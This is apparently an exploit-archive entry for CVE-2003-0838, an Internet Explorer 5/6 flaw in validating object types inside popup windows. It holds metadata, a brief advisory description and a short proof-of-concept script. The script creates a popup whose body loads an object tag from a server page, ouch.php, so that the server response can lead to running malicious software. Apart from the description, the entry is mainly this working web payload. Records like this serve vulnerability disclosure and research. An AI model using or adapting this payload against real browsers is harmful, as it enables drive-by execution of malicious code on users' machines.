Microsoft Internet Explorer 5/6 - Browser Popup Window Object Type Validation
Author: http-equiv
type: remote
platform: windows
port:
date_added: 2003-09-07
date_updated: 2012-12-03
verified: 1
codes: CVE-2003-0838;OSVDB-7872
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/8556/info
Internet Explorer does not properly handle object types, when rendering malicious popup windows. This may result in the possibility of the execution of malicious software.
The problem occurs when Internet Explorer receives a response from the server when a malicious popup window containing an object tag is parsed. Proper parameter checks of the type of file being loaded are not performed on the object type contained within HTTP response received from the web server.
<script>
var oPopup = window.createPopup();
function showPopup() {
oPopup.document.body.innerHTML = "<object data=ouch.php>";
oPopup.show(0,0,1,1,document.body);
}
showPopup()
</script>